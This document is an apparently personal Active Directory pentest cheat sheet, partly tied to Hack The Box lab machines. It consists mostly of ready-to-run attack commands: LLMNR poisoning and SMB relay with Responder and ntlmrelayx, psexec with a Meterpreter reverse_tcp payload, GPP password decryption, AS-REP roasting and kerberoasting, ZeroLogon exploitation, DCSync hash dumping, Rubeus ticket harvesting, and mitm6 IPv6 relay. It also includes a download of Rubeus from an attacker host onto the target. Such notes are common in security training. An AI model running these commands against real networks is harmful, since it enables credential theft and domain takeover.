LLMNR is like DNS on an internal windows network Listen for connections on wrong network drives and retrieve hashes

(Impacket toolkit required)

responder -I tun0 -rdwv

Have the machine access a share

\\badservername\share\file

http://school.flight.htb/index.php?view=//10.10.14.6/share/poc.txt

Password cracking with hashcat (NTLMv2)

hashcat -m 5600 hash.txt rockyou.txt --force

Additional reading:

https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html

SMB Relay

Relay hashes we gathered and gain access to specific machines. Relayed user credentials must be admin on machine.

Check if SMB signing is disabled. (Message signing is enabled but not required)

nmap --script=smb2-security-mode.nse -p445 192.168.57.0

Save relevant hosts to targets.txt

Disable smb and http on responder.conf

nano /etc/responder/Responder.conf

Start listening for events on responder

python responder.py -I eth0 -rdwv

Initialize relay

ntlmrelayx.py -tf targets.txt -smb2support

Retrieve SAM hashes

Using SAM hashes with psexec

msfconsole
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set rhosts
set smbdomain MARVEL.local
set smbuser
set smbpassword # you can also use the NTLM hash
run

psexec.py MARVEL/user:'Password'@192.168.1.2
psexec.py administrator@192.168.1.2 -hashes aaf8dbueaihf3budia:dwafbuubde7vey2

Abusing Group Policy Preferences (GPP)

Find the Groups.xml file.

\\DOMAIN\SYSVOL\domain\Policies\RANDOMOBJECTS\Machine\Preferences\Groups\Groups.xml
or
findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml

Retrieve the cpassword hash. Decrypt.

gpp-decrypt hash

Use can use the credentials with psexec.py or maybe try kerberoasting

Kerberos (AS-REP Roasting)

Run impacket/GetNPUsers.py to get the users that don't have the require pre-authentication option

GetNPUsers.py -dc-ip IP -no-pass -userfile user.txt

or with no creds

GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat

Crack the hashes found

Use evil-winrm to connect to the box using the credentials found

./evil-winrm.rvb -u USER -p PASSWORD -i IPADDR

Use ntlmrelay.py from Impacket to relay any changes made to LDAP.

ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco

Authenticate by visiting http://localhost/privexchange (any directory will work, this is random). This sets the user ad Domain Admin.

Abusing ZeroLogon

python3 zerologon_check.py DC IP
python3 cve-2020-1472-exploit.py DC IP

Use Impacket’s secretsdump.py to perform the DCSync attack, gathering all the user hashes:

secretsdump.py -just-dc DOMAIN/DC\$@IP

secretsdump.py htb.local/user:password@10.10.10.161 -just-dc -outputfile secrets-dump.txt

evil-winrm -u Administrator -i 10.10.10.161 -H '32693b11e6aa90eb43d32c72a07ceea6'

In order to find the plain password hex and restore the password
secretsdump.py administrator@IP -hashes HASH
python3 restorepassword.py DOMAIN/DC@DC_HOSTNAME -target-ip IP -hexpass HEXPASS

Kerbrute

Kerbrute is a popular enumeration tool used to brute-force and enumerate valid active-directory users by abusing the Kerberos pre-authentication.

You need to add the DNS domain name along with the machine IP to /etc/hosts inside of your attacker machine: 10.10.117.212 CONTROLLER.local

./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt

Harvesting Tickets w/ Rubeus

On the target machine

Rubeus.exe harvest /interval:30

Rubeus.exe kerberoast
This will dump the Kerberos hash of any kerberoastable users

Dumping KRBASREP5 Hashes w/ Rubeus

Rubeus.exe asreproast

DCSync w/ Rubeus

Upload rubeus with a compiled binary from SharpColection

powershell wget 10.10.14.6/Rubeus.exe -outfile rubeus.exe
.\rubeus.exe tgtdeleg /nowrap

Configure Kerberos ticket

Decode the base64 ticket and save it as ticket.kirbi. Then kirbi2ccache will convert it to the format needed by my Linux system:

kirbi2ccache ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache

Time Issues

It’s really common when doing these kinds of attacks to run into time issues. Fix time with ntpdate.

sudo ntpdate -s flight.htb

Execute secrets dump with the env variable set previously.

secretsdump.py -k -no-pass g0.flight.htb -just-dc-user administrator

Crack the resulting hashes

Ipv6 DNS Takeover via mitm6

GitHub - fox-it/mitm6: pwning IPv4 via IPv6

mitm6 -d marvel.local

Setup relay attack

ntlmrelayx.py -6 -t ldaps://DCIPADDR -wh fakewpad.marvel.local -l lootme

Just run this for 5 or 10 minutes

The worst of both worlds: Combining NTLM Relaying and Kerberos delegation - dirkjanm.io

Pass-Back Attack

Hacking a printer and gettting LDAP credentials trough a Pass-Back Attack

Pentest Cheat Sheet

Active Directory

LLMNR Poisoning